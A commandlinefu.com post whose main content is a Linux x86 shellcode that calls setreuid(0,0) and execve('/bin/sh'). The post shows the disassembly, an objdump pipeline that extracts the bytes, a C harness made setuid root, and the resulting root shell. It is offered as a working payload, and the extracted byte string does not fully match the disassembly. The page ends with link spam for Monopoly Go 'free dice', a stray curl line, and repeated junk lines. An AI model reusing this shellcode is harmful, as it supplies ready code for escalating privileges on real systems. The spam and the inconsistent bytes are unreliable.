gunslinger@localhost:~/$ objdump -d shell shell: file format elf32-i386 Disassembly of section .text: 08048060 <.text>: 8048060: 31 c0 xor %eax,%eax 8048062: 31 db xor %ebx,%ebx 8048064: 31 c9 xor %ecx,%ecx 8048066: 31 d2 xor %edx,%edx 8048068: b0 46 mov $0x46,%al 804806a: 31 db xor %ebx,%ebx 804806c: 31 c9 xor %ecx,%ecx 804806e: cd 80 int $0x80 8048070: b0 0b mov $0xb,%al 8048072: 53 push %ebx 8048073: 68 2f 2f 73 68 push $0x68732f2f 8048078: 68 2f 62 69 6e push $0x6e69622f 804807d: 89 e3 mov %esp,%ebx 804807f: 31 c9 xor %ecx,%ecx 8048081: 31 c9 xor %ecx,%ecx 8048083: 53 push %ebx 8048084: cd 80 int $0x80 gunslinger@localhost:~/$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\xcd\x80\x31\xc0\xb0\x0b\x31\xdb\xcd\x80" gunslinger@localhost:~/$ -------------------------------shellcodetest.c--------------------------------- char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31" "\xc9\xcd\x80\xb0\x0b\x53\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\x53\xcd\x80"; int main(void) { (*(void(*)()) shellcode)(); } ------------------------------------EOF---------------------------------------- root@localhost:/home/gunslinger/# vim shellcodetest.c root@localhost:/home/gunslinger/# cat shellcodetest.c char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31" "\xc9\xcd\x80\xb0\x0b\x53\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\x53\xcd\x80"; int main(void) { (*(void(*)()) shellcode)(); } root@localhost:/home/gunslinger/# gcc -o shellcodetest shellcodetest.c root@localhost:/home/gunslinger/# chown root:root shellcodetest.c root@localhost:/home/gunslinger/# chmod 4755 shellcodetest root@localhost:/home/gunslinger/# exit gunslinger@localhost:~/$ ./shellcodetest # id uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger) # whoami root # echo GAMEOVER GAMEOVER # exit gunslinger@localhost:~/$
Better than the others, and actually works unlike some of them. Show Sample Output
Any thoughts on this command? Does it work on your machine? Can you do the same thing with only 14 characters?
You must be signed in to comment.
commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.
Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.
» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10
Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):
Subscribe to the feed for:
<a href="https://www.nearshoring-info.ch/benefits-of-nearshoring/">Check this out</a>
href="https://eduabzarwp.ir/website-design-with-wp">
https://medium.com/@quindtfrederic128/how-to-get-free-dice-on-monopoly-go-the-best-free-methods-3302946e0368
https://medium.com/@rival44885/monopoly-go-free-dice-in-2024-a86b13aa1c2a
https://medium.com/@xaremi5735/free-dice-on-monopoly-go-2024-how-you-can-get-it-6cf1950b9678
https://medium.com/@depim20797/how-to-get-free-rolls-on-monopoly-go-fast-quickly-c5aed0905bf4
https://medium.com/@cewecet136/how-to-get-free-dice-on-monopoly-go-without-verification-latest-trick-aeb8539f0b44
man ls https://medium.com/@rival44885/monopoly-go-free-dice-in-2024-a86b13aa1c2a
https://medium.com/@rival44885/monopoly-go-free-dice-in-2024-a86b13aa1c2a
curl -s <https://medium.com/@rival44885/monopoly-go-free-dice-in-2024-a86b13aa1c2a>
dfkjgdf?url=http://<https://medium.com/@rival44885/monopoly-go-free-dice-in-2024-a86b13aa1c2a>
man ls
man ls
https://medium.com/@rival44885/monopoly-go-free-dice-in-2024-a86b13aa1c2aman ls
man ls
man ls
man ls
man ls
man ls